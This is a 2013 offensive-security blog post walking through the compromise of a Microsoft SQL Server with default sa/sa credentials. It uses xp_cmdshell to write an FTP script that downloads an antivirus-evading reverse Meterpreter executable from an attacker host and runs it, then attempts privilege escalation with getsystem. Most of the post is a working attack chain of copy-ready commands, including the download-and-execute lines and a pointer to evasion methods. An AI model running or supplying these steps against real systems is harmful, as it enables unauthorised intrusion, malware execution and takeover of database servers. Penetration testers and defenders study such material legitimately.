Thursday, July 18, 2013

Unprivileged MS SQL Server Service and A/V to Meterpreter Shell

Hey! Long time no blog! I know its been a long while, but here is a fun one that I came across recently that I'd like to share...

Lets say you run were able to find a MS SQL Server instance that was using creds of sa/sa. You think to yourself, SWEET! This is easy! You then try to use the metasploit xp_cmdshell module and find that you can't create a new local user... ACCESS DENIED! Doh! Then you try to use the metasploit mssql_exec module to upload a payload... <cricket> <cricket>... nothing. You realize that MS SQL is running under an unprivileged account and the machine might be running A/V also. So what next? How can we pwn this thing?

Here is one method that you can use...
  1. Connect to the server using MS SQL Server Management Studio. I prefer this way over running the metasploit xp_cmdshell module since it is a lot easier to enter multiple commands. Next we want to get a shell on the system so that we can maneuver around the system easier and attempt to escalate privileges. Since we can only execute one command at a time with xp_cmdshell, we need to find a one line command to download a file somehow. For this we can use the Windows built-in "ftp" command along with a script file.

  2. We will first setup a FTP server to host our file. We can use the metasploit "auxiliary/server/ftp" module for this purpose. Configure it with a username, password, and with a root directory. Run the module with "run" and it will automatically run it as a background job.


  3. Next we will create a reverse meterpreter executable to bypass A/V and place it into the ftp root directory. I won't go into the specifics in this post as there are lots of resources out there. Although one of my favorite methods that is also super easy to use is detailed here: https://www.christophertruncer.com/bypass-antivirus-with-meterpreter-as-the-payload-hyperion-fun/

  4. We now need to setup a handler in metasploit to catch the reverse shell. For this we can use the "exploit/multi/handler" module. Configure the module to match the settings used in your reverse meterpreter executable created in the last step. Run the module with "exploit -j" to run it as a background job.


  5. We will then use the xp_cmdshell stored procedure to create a script file in a folder that the user has access to, typically "c:\windows\temp" is a good bet. The first two lines will send the username and password for the FTP server. The lines after that will set the transfer mode to binary, change directories locally to our c:\windows\temp folder, download the file, and then quit. In MS SQL Server Management Studio, open a new Query window and execute the following queries:

    exec xp_cmdshell 'echo ftpuser > c:\windows\temp\ftp.txt';
    exec xp_cmdshell 'echo ftppass >> c:\windows\temp\ftp.txt';
    exec xp_cmdshell 'echo binary >> c:\windows\temp\ftp.txt';
    exec xp_cmdshell 'echo lcd c:\windows\temp >> c:\windows\temp\ftp.txt';
    exec xp_cmdshell 'echo get file.exe >> c:\windows\temp\ftp.txt';
    exec xp_cmdshell 'echo quit >> c:\windows\temp\ftp.txt'; 


  6. Now you want to ensure that the ftp.txt file is complete by executing the following query:

  7. exec xp_cmdshell 'type c:\windows\temp\ftp.txt';


  8. We will now use the "ftp" command to download the file by executing the following query replacing the IP address with your FTP server's IP address:

  9. exec xp_cmdshell 'ftp -s:c:\windows\temp\ftp.txt 10.0.0.2';

  10. Lets verify that the file has downloaded into our temp directory and hasn't been detected and killed by A/V by executing the following query:

  11. exec xp_cmdshell 'dir c:\windows\temp';

  12. Now that everything is setup and ready to go, we can finally execute the reverse meterpreter file and wait for a connection in metasploit by executing the following query:

  13. exec xp_cmdshell 'c:\windows\temp\file.exe';

  14. Once you have your established meterpreter session, you can do all the usual things. Since the MS SQL Server account is an unprivileged user, we can attempt to escalate privileges by using the command "getsystem". If that works, then you are golden! Have fun and enjoy!!